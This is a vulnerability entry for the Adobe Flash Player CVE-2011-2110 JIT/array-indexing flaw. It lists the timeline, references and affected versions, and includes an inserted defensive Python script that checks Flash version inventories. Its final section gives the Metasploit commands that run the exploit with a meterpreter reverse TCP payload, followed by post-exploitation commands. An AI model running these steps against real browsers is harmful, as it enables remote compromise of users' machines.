Timeline :

Vulnerability discovered being exploited in the wild
Vulnerability publicly disclosed by the vendor on 2011-06-14
Details of the vulnerability provided on 2011-10-09
Metasploit PoC provided on 2012-06-19

PoC provided by :

mr_me
Unknown

Reference(s) :

CVE-2011-2110
OSVDB-73007
APSB11-18
BID-48268

Affected version(s) :

Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 10.3.185.23 and earlier versions for Android
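From a defender's side, the useful artefact from the affected-version list above is a triage check: given the version string Flash reports (its "$version" form such as "WIN 10,3,181,23", or a plain dotted "10.3.181.23"), decide whether a host still falls inside the range the advisory lists as vulnerable. The script below is an added example, not part of the original page or of the Metasploit module; the only facts it encodes are the two ceilings stated above (10.3.181.23 for Windows/Macintosh/Linux/Solaris, 10.3.185.23 for Android). The inventory lines in the usage section are constructed, and mapping the "AND" platform prefix to Android is an assumption of this example.

```python
"""Triage helper for CVE-2011-2110 / APSB11-18 affected Flash Player versions.

Added example, not part of the original page or the Metasploit module.
Encodes only the affected-version ceilings given on the page.
"""
import re
from typing import List, Optional, Tuple

# Highest affected versions as listed on the page, per platform family.
MAX_AFFECTED = {
    "desktop": (10, 3, 181, 23),   # Windows, Macintosh, Linux, Solaris
    "android": (10, 3, 185, 23),
}

# Flash reports its version either as "<OS> a,b,c,d" (comma separated with a
# three-letter platform prefix such as WIN/MAC/LNX) or as dotted "a.b.c.d".
_VERSION_RE = re.compile(r"(?:(?P<os>[A-Z]{3})\s+)?(?P<nums>\d+(?:[.,]\d+){0,3})")


def parse_flash_version(text: str) -> Tuple[Optional[str], Tuple[int, ...]]:
    """Return (platform_prefix_or_None, 4-tuple of ints) for a Flash version string."""
    m = _VERSION_RE.search(text.strip())
    if not m:
        raise ValueError(f"unrecognised Flash version string: {text!r}")
    nums = tuple(int(p) for p in re.split(r"[.,]", m.group("nums")))
    nums = nums + (0,) * (4 - len(nums))  # pad a short "10.3" to (10, 3, 0, 0)
    return m.group("os"), nums


def is_affected(text: str, platform: Optional[str] = None) -> bool:
    """True if the reported version is at or below the advisory's affected ceiling.

    platform may be "desktop" or "android"; when omitted, the "AND" prefix
    (assumed here to be the Android platform tag) selects the Android ceiling,
    anything else selects the desktop ceiling.
    """
    os_tag, version = parse_flash_version(text)
    family = platform or ("android" if os_tag == "AND" else "desktop")
    # Tuple comparison is lexicographic, so 10.3.181.26 > 10.3.181.23 as expected.
    return version <= MAX_AFFECTED[family]


def triage_inventory(lines: List[str]) -> List[str]:
    """Given 'hostname<TAB>flash_version' lines, return the hosts still affected."""
    affected = []
    for line in lines:
        host, _, version = line.partition("\t")
        if host and is_affected(version):
            affected.append(host)
    return affected


if __name__ == "__main__":
    # Constructed inventory sample: hostname, tab, reported Flash version.
    sample = [
        "ws01\tWIN 10,3,181,23",   # exactly the ceiling: still affected
        "ws02\tWIN 10,3,183,7",    # above the ceiling: not affected
        "ws03\tLNX 10,3,162,29",   # older: affected
        "tab01\tAND 10,3,185,25",  # Android, above its ceiling: not affected
    ]
    for host in triage_inventory(sample):
        print(f"{host}: Flash Player within CVE-2011-2110 affected range")
```

Because the page gives only the upper bound of the affected range, the check treats everything at or below that bound as vulnerable; it says nothing about whether a higher version is the actual patched build, so pair it with the vendor bulletin (APSB11-18) when deciding what "fixed" means for your fleet.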

Tested on Windows XP Pro SP3 with :

Internet Explorer 8
Adobe Flash Player 10.3.181.23

Description :

This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. The issue is caused by a failure in the ActionScript 3 AVM2 verification logic, which results in unsafe JIT (Just-In-Time) code being executed. This is the same vulnerability that was used in attacks against Korea-based organizations. Specifically, when an array is indexed with an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying, as the vulnerability can also be used for information leakage. Currently this exploit works on IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. The exploit bypasses ASLR/DEP and is very reliable.

Commands :

use exploit/windows/browser/adobe_flashplayer_arrayindexing
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid